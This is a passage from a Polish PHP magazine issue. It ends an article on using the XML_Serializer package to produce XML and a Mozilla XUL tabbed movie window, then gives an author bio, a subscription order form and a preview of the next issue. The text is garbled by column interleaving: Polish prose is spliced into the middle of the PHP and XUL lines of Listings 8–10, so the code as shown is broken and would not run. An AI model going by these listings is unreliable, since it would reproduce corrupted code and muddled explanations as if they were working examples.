ry zostanie następnie zinterpretowany

Listing 8. Tablica danych o filmach po przebudowaniu do pracy w trybie simplexml przez przeglądarkę jako okno interfejsu
użytkownika z zakładkami zawierający-
$characters = array(
array( mi dodatkowe informacje o filmach po-
'attr' => array('name' => 'Leeloo'), brane z bazy danych IMDB (Rysunek 1).
'actor' => 'Milla Jovovich', Listing 9 przedstawia kod realizujący to
'imdb' => 'nm0000170'), zadanie.
array(
Dane z tablicy $movies z poprzed-
'attr' => array('name' => 'Korben Dallas'),
'actor' => 'Bruce Willis', niego przykładu są pobierane w pę-
'imdb' => 'nm0000246')); tli foreach i używane do stworzenia no-
$movies=array('movie'=>array(array('attr'=>array('name' => wej tablicy, na podstawie której zosta-
'Piąty Element'), nie wygenerowany kod XUL. Niektóre
'writer' => "Luc Besson",
z opcji poznaliśmy już wcześniej, lecz
'year' => "1997",
'imdb' => "tt0119116", pojawia się również kilka nowych. Opcja
'character' => $characters)); rootAttributes przyjmuje argument
$options = array ( w postaci tablicy określającej atrybuty dla
'rootName' => 'movies', znacznika głównego – generujemy doku-
'attributesArray' => "attr",
ment XUL, więc musimy podać odpo-
'mode' => 'simplexml');
wiednią dla tego formatu wartość atrybu-
Listing 9. Kod generujący dokument z definicją interfejsu XUL tu namespace. Dodatkowo nadałem oknu
tytuł Moje ulubione filmy i ustawiłem
$browser_data = array('height' => "400", 'width' => "550");
dwie spacje jako ciąg używany tworzenia
foreach ($movies['movie'] as $m){
$tabs["tab"][]=array('label'=>$m['attr']['name']."({$m['year']})");
wcięć w kodzie XML (to oczywiście tylko
$url = "http://us.imdb.com/title/". $m['imdb']; kosmetyka, ale dzięki temu kod jest bar-
$movie_site = array("src" => $url,"id" => $m['imdb']); dziej czytelny).
$tab['label'] = $m['attr']['name']; Listing 10 przedstawia kod XML gene-
$tab['browser'] = array_merge($browser_data, $movie_site);
rowany przez ten przykład, a na Rysun-
$tab_panels['tabpanel'][] = $tab;
}
ku 1 widzimy ostateczną postać interfej-
$data = array("tabbox" => array("tabs" => $tabs, "tabpanels" => $tab_panels)); su XUL wyświetlanego przez przeglądar-
$options = array ('addDecl' => TRUE, ki Mozilla.
'rootName' => 'window',
"defaultTagName" => 'tab',
"scalarAsAttributes" => true,
Podsumowanie
"mode" => 'simplexml',
W tym krótkim artykule poznaliśmy zasa-
'indent' => ' ', dy wykorzystania pakietu XML_Serializer
'rootAttributes' => array("xmlns" => do tworzenia różnego rodzaju plików
"http://...is.only.xul","title"=>"Moje ulubione filmy")); XML. XML_Serializer to naprawdę świetny
$serializer = &new XML_Serializer($options);
pakiet i intensywnie korzystam z niego
$status = $serializer->serialize($data);
$xml = $serializer->getSerializedData();
w codziennej pracy. Istnieją wprawdzie
header('Content-type: application/vnd.mozilla.xul+xml'); inne sposoby generowania kodu XML, ale
echo $xml; jak dotąd nie znalazłem żadnego rozwią-
zania, które sprawdzałoby się równie do-
Listing 10. Kod XUL wygenerowany przez przykładowy skrypt brze i byłoby równie proste. Mam nadzieję,
<?xml version="1.0"?> że udało mi się pokazać możliwości tego
<window title="Moje ulubione filmy" xmlns="http://www.mozilla.org/keymaster/ pakietu i że będzie on dla Czytelników
gatekeeper/there.is.only.xul"> równie użyteczny, jak dla mnie. n
<tabbox>
<tabs>
<tab label="Piąty Element (1997)" />
<tab label="High Fidelity (2000)" />
</tabs> O autorze
<tabpanels>
<tabpanel label="Piąty Element"> Aaron Wormus programuje w PHP od
<browser height="400" id="tt0119116" src="..." width="550" /> 1999 r. Zajmował się tworzeniem roz-
</tabpanel> wiązań intranetowych w Perlu i technolo-
<tabpanel label="High Fidelity"> giach pokrewnych. Aaron koncentruje się
<browser height="400" id="tt0146882" src="..." width="550" /> na dostarczaniu przedsiębiorstwom wy-
</tabpanel> sokiej jakości rozwiązań intranetowych
</tabpanels> i wykorzystuje potęgę PHP w pracy kon-
</tabbox> sultanta.
</window>
Kontakt z autorem: aaron@wormus.com

80 www.phpsolmag.org PHP Solutions Nr 3/2006

zamówienie prenumeraty

Prosimy wypełnić czytelnie i przesłać faksem na numer: (22) 887 10 11 lub listownie na adres: Software-Wydawnictwo Sp. z o.o.,
Piaskowa 3, 01-067 Warszawa, e-mail: pren@software.com.pl. Przyjmujemy też zamówienia telefoniczne: (22) 887 14 44

Imię i nazwisko............................................................................................ ID kontrahenta..........................................................................................

Nazwa firmy................................................................................................. Numer NIP firmy.......................................................................................

Dokładny adres....................................................................................................................................................................................................................

Telefon (wraz z numerem kierunkowym)................................................... Faks (wraz z numerem kierunkowym) ....................................................

E-mail (niezbędny do wysłania faktury)............................................................................................................................................................................

automatyczne przedłużenie prenumeraty

Tytuł
Ilość Od numeru Opłata
Ilość
zamawianych pisma lub w zł
numerów
prenumerat miesiąca z VAT
Software Developer’s Journal (1 płyta CD)
– dawniej Software 2.0 12 250/1801
Miesięcznik profesjonalnych programistów
SDJ Extra (od 1 do 4 płyt CD lub DVD)
– dawniej Software 2.0 Extra! 6 150/1352
Numery tematyczne dla programistów

Linux+ (2 płyty CD)

Miesięcznik o systemie Linux
12 250/1801

Linux+DVD (2 płyty DVD)

Miesięcznik o systemie Linux
12 270/1981

Linux+Extra! (od 1 do 7 płyt CD lub DVD)

Numery specjalne z najpopularniejszymi dystrybucjami Linuksa
8 232/1982

PHP Solutions (1 płyta CD)

Dwumiesięcznik o zastosowaniach języka PHP
6 135

Hakin9, jak się obronić (1 płyta CD)

Dwumiesięcznik o bezpieczeństwie i hakingu
6 135

.psd (1 płyta CD + film instruktażowy)

Dwumiesięcznik użytkowników programu Adobe Photoshop
6 140

Aurox Linux (4 płyty CD + 1 płyta DVD)

Magazyn z najpopularniejszym polskim Linuksem
4 1193

Suma

Jeżeli chcesz zapłacić kartą kredytową, wejdź na

stronę naszego sklepu internetowego:
1
Cena prenumeraty rocznej dla osób prywatnych
2
Cena prenumeraty rocznej dla osób prenumerujących już Software Developer’s Journal lub Linux+
3
Cena prenumertaty dwuletniej Aurox Linux www.shop.software.com.pl
 W następnym numerze
PHP Solutions 4/2006(15)

TECHNIKI
PHP, XML i Java – Guillaume Ponçon krok
po kroku przedstawi łączenie w PHP dwóch
bardzo ważnych technologii: XML oraz Java.
Artykuł pod tytułem PHP, XML i Java w praktyce
wyczerpująco przedstawi te zagadnienia.

NARZĘDZIA
EyeOS – Web Based Desktop System
– Po raz drugi staniemy przed pytaniem: Internet
na biurku czy biurko w Internecie? Artykuł rozwi-
nie wątki poruszone w tym numerze skupiając
się na technicznych aspektach działania systemu
oraz jego aplikacji.

PROJEKTY
Video streaming – Stefan Richter, Frederic
Bochman z flashcomguru.com pokażą techniki,
które pozwoliły na zbudowanie Google
Video, oraz kompletne rozwiązanie pozwalają-
ce na uruchomienie Video Streamingu na wła-
snym serwerze.

Porównanie Galerii zdjęć w PHP – wśród

dostępnych rozwiązań można przebierać, ale
ile z nich naprawdę zasługuje na naszą uwagę?
Które należy brać pod uwagę w przypadku spe-
cjalnych wymagań? Na te pytanie postaramy
się odpowiedzieć w tym porównaniu, stworzo-
nym przy współpracy z developerami poszcze-
gólnych projektów.

Ponadto planujemy: W sprzed

aży
od 20 cze
■
■
MSSQL i PHP
IRC BOT w PHP
rwca!
■ Wzorzec Active Record i jego zaawansowane zastosowania

a także ciąg dalszy artykułów poświęconych bezpieczeństwu aplikacji

oraz wykorzystaniu wzorców projektowych